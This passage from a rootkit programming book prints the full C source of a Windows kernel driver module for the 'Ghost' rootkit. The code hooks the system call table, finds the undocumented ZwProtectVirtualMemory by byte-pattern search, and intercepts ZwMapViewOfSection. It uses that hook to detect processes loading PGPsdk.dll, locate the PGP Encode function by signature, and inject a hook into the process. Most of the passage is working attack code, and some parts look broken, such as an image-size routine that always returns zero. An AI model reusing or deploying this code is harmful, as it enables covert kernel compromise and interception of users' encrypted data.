
The file hookManager.c has been expanded to contain ten functions:

  • HookKernel-Previously Hook, but now we have kernel and library hooking

  • NewZwMapViewOfSection–Modified to set up library hooks

  • IsSameFile–Removed input checks to simplify

  • IsSameString–Used by GetFunctionAddress to match library functions

  • MapKernelAddress–Used by GetImageSize and GetFunctionAddress

  • FreeKernelAddress–Used by GetImageSize and GetFunctionAddress

  • GetImageSize–Used by GetFunctionAddress

  • findUnresolved–Finds ZwProtectVirtualMemory

  • GetFunctionAddress–Gets the address of a function from a DLL

  • checkPattern–A fast pattern-matching algorithm

Following is the code:

  // hookManager // Copyright Ric Vieler, 2006 // Hook the System Call Table #include "ntddk.h" #include "Ghost.h" #include "hookManager.h" #include "peFormat.h" #include "injectManager.h" // Add kernel hook(s) NTSTATUS HookKernel( ) {  DWORD functionAddress;  DWORD position;  pMyMDL = MmCreateMdl(NULL,   KeServiceDescriptorTable.ServiceTableBase,   KeServiceDescriptorTable.NumberOfServices * 4 );  if( !pMyMDL )   return( STATUS_UNSUCCESSFUL );  MmBuildMdlForNonPagedPool( pMyMDL );  pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;  NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );  if( !NewSystemCallTable )   return( STATUS_UNSUCCESSFUL );  // Need ZwProtectVirtualMemory to write into user memory.  // But it's not defined in ntddk.h so look for pattern  // searching backward from ZwPulseEvent  OldZwProtectVirtualMemory = findUnresolved(ZwPulseEvent);  if( OldZwProtectVirtualMemory == 0 )   return( STATUS_UNSUCCESSFUL );  // Add hooks here (remember to unhook if using DriverUnload)  HOOK( ZwMapViewOfSection, NewZwMapViewOfSection, OldZwMapViewOfSection );  return( STATUS_SUCCESS ); } // Process Inject Dynamic Link Libraries NTSTATUS NewZwMapViewOfSection(     IN HANDLE SectionHandle,     IN HANDLE ProcessHandle,     IN OUT PVOID *BaseAddress,     IN ULONG ZeroBits,     IN ULONG CommitSize,     IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,     IN OUT PSIZE_T ViewSize,     IN SECTION_INHERIT InheritDisposition,     IN ULONG AllocationType,     IN ULONG Protect ) {  NTSTATUS status;  // First complete the standard mapping process  status = OldZwMapViewOfSection(SectionHandle,   ProcessHandle,   BaseAddress,   ZeroBits,   CommitSize,   SectionOffset OPTIONAL,   ViewSize,   InheritDisposition,   AllocationType,   Protect );  // Now remap as required ( imageOffset only known for versions 4 & 5 )  if( NT_SUCCESS( status ) && ( majorVersion == 4 || majorVersion == 5 ) )  {   unsigned int imageOffset = 0;   VOID* pSection = NULL;   unsigned int imageSection = FALSE;   HANDLE hRoot = NULL;   PUNICODE_STRING objectName = NULL;   PVOID pImageBase = NULL;   UNICODE_STRING library1 = { 0 };   UNICODE_STRING library2 = { 0 };   CALL_DATA_STRUCT callData[TOTAL_HOOKS] = { 0 };   int hooks2inject = 0;   // Image location higher in version 4   if( majorVersion == 4 )    imageOffset = 24;   if( ObReferenceObjectByHandle(SectionHandle,    SECTION_MAP_EXECUTE,    *MmSectionObjectType,    KernelMode,    &pSection,    NULL ) == STATUS_SUCCESS )   {    // Check to see if this is an image section    // If it is, get the root handle and the object name    _asm    {     mov     edx, pSection     mov     eax, [edx+14h]     add     eax, imageOffset     mov     edx, [eax]     test    byte ptr [edx+20h], 20h     jz      not_image_section     mov     imageSection, TRUE     mov     eax, [edx+24h]     mov     edx, [eax+4]     mov     hRoot, edx     add     eax, 30h     mov     objectName, eax     not_image_section:    }    if( BaseAddress )     pImageBase = *BaseAddress;    // Mapping a DLL    if( imageSection && pImageBase && objectName && objectName->Length > 0 )    {     // define libraries of interest     RtlInitUnicodeString( &library1, L"kernel32.dll" );     RtlInitUnicodeString( &library2, L"PGPsdk.dll" );     if ( IsSameFile( &library1, objectName ) ) // kernel32     {      kernel32Base = pImageBase;     }     else if ( IsSameFile( &library2, objectName ) ) // PGPsdk     {      // Pattern for PGP 9.0 Encode      BYTE pattern1[] = { 0x55, 0x8B, 0xEC, 0x83, 0xE4, 0xF8, 0x81, 0xEC, \       0xFC, 0x00, 0x00, 0x00, 0x53, 0x33, 0xC0, 0x56, \       0x57, 0xB9, 0x26, 0x00, 0x00, 0x00, 0x8D, 0x7C, \       0x24, 0x18, 0xF3, 0xAB };      PVOID pfEncode = GetFunctionAddress( pImageBase, NULL, pattern1, sizeof(pattern1) );      if( !pfEncode )      {       // Pattern for PGP 9.5 Encode       BYTE pattern2[] = { 0x81, 0xEC, 0xFC, 0x00, 0x00, 0x00, 0x53, 0x55, \        0x33, 0xDB, 0x68, 0x98, 0x00, 0x00, 0x00, 0x8D, \        0x44, 0x24, 0x14, 0x53, 0x50, 0x89, 0x9C, 0x24, \        0xB4, 0x00, 0x00, 0x00 };       pfEncode = GetFunctionAddress( pImageBase, NULL, pattern2, sizeof(pattern2) );      }      if( pfEncode )      {       hooks2inject = 1;       callData[0].index = USERHOOK_beforeEncode;       callData[0].hookFunction = pfEncode;       callData[0].parameters = 2;       callData[0].callType = CDECL_TYPE;       callData[0].stackOffset = 0;       DbgPrint("comint32: NewZwMapViewOfSection pfEncode = %x",pfEncode);      }      else      {       DbgPrint("comint32:  PGP Encode not found.");      }     }     if( hooks2inject > 0 )     {      PCHAR injectedMemory;      // prepare memory      injectedMemory = allocateUserMemory();      // inject      if( !processInject( (CALL_DATA_STRUCT*)&callData, hooks2inject, injectedMemory ) )      {       DbgPrint("comint32: processInject failed!\n" );      }     }    }    ObDereferenceObject( pSection );   }  }  return status; } // Used to compare a full path to a file name BOOL IsSameFile(PUNICODE_STRING shortString, PUNICODE_STRING longString) {  USHORT index;  USHORT longLen;  USHORT shortLen;  USHORT count;  index = longString->Length / 2; // wchar_t len is length / 2  // search backwards for backslash  while( --index )   if ( longString->Buffer[index] == L'\\' )    break;  // check for same length first  longLen = (longString->Length / 2) - index - 1;  shortLen = shortString->Length / 2;  if( shortLen != longLen )   return FALSE;  // Compare  count = 0;  while ( count < longLen )   if ( longString->Buffer[++index] != shortString->Buffer[count++] )    return FALSE;  // Match!  return TRUE; } // Compare to char strings BOOL IsSameString( char* first, char* second ) {  while( *first && *second )  {   if( tolower( *first ) != tolower( *second ) )    return FALSE;   first++;   second++;  }  if( *first || *second )   return FALSE;  // strings match!  return TRUE; } // Map user address space into the kernel PVOID MapKernelAddress( PVOID pAddress, PMDL* ppMDL, ULONG size ) {  PVOID pMappedAddr = NULL;  *ppMDL = IoAllocateMdl( pAddress, size, FALSE, FALSE, NULL );  if( *ppMDL == NULL )   return NULL;  __try  {   MmProbeAndLockPages( *ppMDL, KernelMode ,IoReadAccess );  }  __except( EXCEPTION_EXECUTE_HANDLER )  {   IoFreeMdl( *ppMDL );   *ppMDL = NULL;   return NULL;  }  pMappedAddr = MmGetSystemAddressForMdlSafe( *ppMDL, HighPagePriority );  if( !pMappedAddr )  {   MmUnlockPages( *ppMDL );   IoFreeMdl( *ppMDL );   *ppMDL = NULL;   return NULL;  }  return pMappedAddr; } // Free kernel space after mapping in user memory VOID FreeKernelAddress( PVOID* ppMappedAddr, PMDL* ppMDL ) {  if( *ppMappedAddr && *ppMDL )   MmUnmapLockedPages( *ppMappedAddr, *ppMDL );  *ppMappedAddr = NULL;   if( *ppMDL )   {    MmUnlockPages( *ppMDL );    IoFreeMdl( *ppMDL );   }   *ppMDL = NULL; } // get DOS Header -> NT Header -> Optinal Header -> SizeOfImage ULONG GetImageSize( PVOID baseAddress ) {  PIMAGE_DOS_HEADER pDOSHeader;  PIMAGE_NT_HEADER pNTHeader;  ULONG imageSize = 0;  PVOID pTempNTHeader;  PVOID mappedBase;  PMDL pMDL;  mappedBase = MapKernelAddress( baseAddress, &pMDL, sizeof(PIMAGE_DOS_HEADER) );  if( mappedBase )  {   pDOSHeader = (PIMAGE_DOS_HEADER)mappedBase;   pTempNTHeader = (PVOID)(pDOSHeader->e_lfanew);   FreeKernelAddress( &mappedBase, &pMDL );   mappedBase = MapKernelAddress( (PVOID)((ULONG)baseAddress + (ULONG)pTempNTHeader), &pMDL, sizeof(PIMAGE_NT_HEADER) );   if( mappedBase )   {    pNTHeader = (PIMAGE_NT_HEADER)mappedBase;    FreeKernelAddress( &mappedBase, &pMDL );   }  }  return imageSize; } // find an undocumented ntdll function PVOID findUnresolved( PVOID pFunc ) {  UCHAR pattern[5] = { 0 };  PUCHAR bytePtr = NULL;  PULONG oldStart = 0;  ULONG newStart = 0;  memcpy( pattern, pFunc, 5 );  // subtract offset  oldStart = (PULONG)&(pattern[1]);  newStart = *oldStart - 1;  *oldStart = newStart;  // Search for pattern  for( bytePtr = (PUCHAR)pFunc - 5; bytePtr >= (PUCHAR)pFunc - 0x800; bytePtr-- )   if( checkPattern( bytePtr, pattern, 5 ) == 0 )    return (PVOID)bytePtr;  // pattern not found  return NULL; } // Get the address of a function from a DLL // Pass in the base address of the DLL // Pass function name OR pattern and pettern length PVOID GetFunctionAddress(PVOID BaseAddress,   char* functionName,   PBYTE pattern,   size_t patternLength  ) {  ULONG imageSize;  ULONG virtualAddress;  PVOID returnAddress;  PULONG functionAddressArray;  PWORD ordinalArray;  PULONG functionNameArray;  ULONG loop;  ULONG ordinal;  PVOID mappedBase;  PMDL pMDL;  BYTE* bytePtr;  BYTE* maxBytePtr;  PIMAGE_DOS_HEADER pDOSHeader;  PIMAGE_NT_HEADER pNTHeader;  PIMAGE_EXPORT_DIRECTORY exportDirectory;  imageSize = GetImageSize( BaseAddress );  mappedBase = MapKernelAddress( BaseAddress, &pMDL, imageSize );  if ( functionName == NULL )  {   // Search for function pattern   returnAddress = 0;   maxBytePtr = (PBYTE)((DWORD)mappedBase + (DWORD)imageSize - (DWORD)patternLength);   for( bytePtr = (PBYTE)mappedBase; bytePtr < maxBytePtr; bytePtr++ )   {    if( checkPattern( bytePtr, pattern, patternLength ) == 0 )    {     returnAddress = (PVOID)((DWORD)BaseAddress + (DWORD)bytePtr - (DWORD)mappedBase);     break;    }   }   if( mappedBase )    FreeKernelAddress( &mappedBase, &pMDL );   return returnAddress;  }  // Search for function name  pDOSHeader = (PIMAGE_DOS_HEADER)mappedBase;  pNTHeader = (PIMAGE_NT_HEADER)((PCHAR)mappedBase + pDOSHeader->e_lfanew);  imageSize = pNTHeader- >OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;  virtualAddress = pNTHeader- >OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;  exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PCHAR)mappedBase + virtualAddress);  functionAddressArray = (PULONG)((PCHAR)mappedBase + exportDirectory- >AddressOfFunctions);  ordinalArray  = (PWORD)((PCHAR)mappedBase + exportDirectory- >AddressOfNameOrdinals);  functionNameArray     = (PULONG)((PCHAR)mappedBase + exportDirectory- >AddressOfNames);  ordinal = (ULONG)functionName;  if (!ordinal)  {   if( mappedBase )    FreeKernelAddress( &mappedBase, &pMDL );   return 0;   }  if( ordinal <= exportDirectory->NumberOfFunctions )  {   if( mappedBase )    FreeKernelAddress( &mappedBase, &pMDL );   return (PVOID)((PCHAR)BaseAddress + functionAddressArray[ordinal - 1]);  }  for( loop = 0; loop < exportDirectory->NumberOfNames; loop++ )  {   ordinal = ordinalArray[loop];   if( functionAddressArray[ordinal] < virtualAddress || functionAddressArray[ordinal] >= virtualAddress + imageSize )   {    if( IsSameString( (PSTR)((PCHAR)mappedBase + functionNameArray[loop]), functionName ) )    {     returnAddress = (PVOID)functionAddressArray[ordinal];     if( mappedBase )      FreeKernelAddress( &mappedBase, &pMDL );     return (PVOID)((DWORD)BaseAddress + (DWORD)returnAddress);     }    }   }   DbgPrint("comint32: EXPORT NOT FOUND, function = %s", functionName);   if( mappedBase )    FreeKernelAddress( &mappedBase, &pMDL );   return 0; } // This should be fast! int checkPattern( unsigned char* pattern1, unsigned char* pattern2, size_t size ) {  register unsigned char* p1 = pattern1;  register unsigned char* p2 = pattern2;  while( size-- > 0 )  {   if( *p1++ != *p2++ )    return 1;  }  return 0; } 

The additions to hookManager enable Ghost to check for applications that load the PGP SDK Dynamic Link Library. After this library is loaded, ZwMapViewOfSection sets up a call data structure, allocates memory from the calling application, and injects a hook into the application that is loading PGPsdk.dll.

Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

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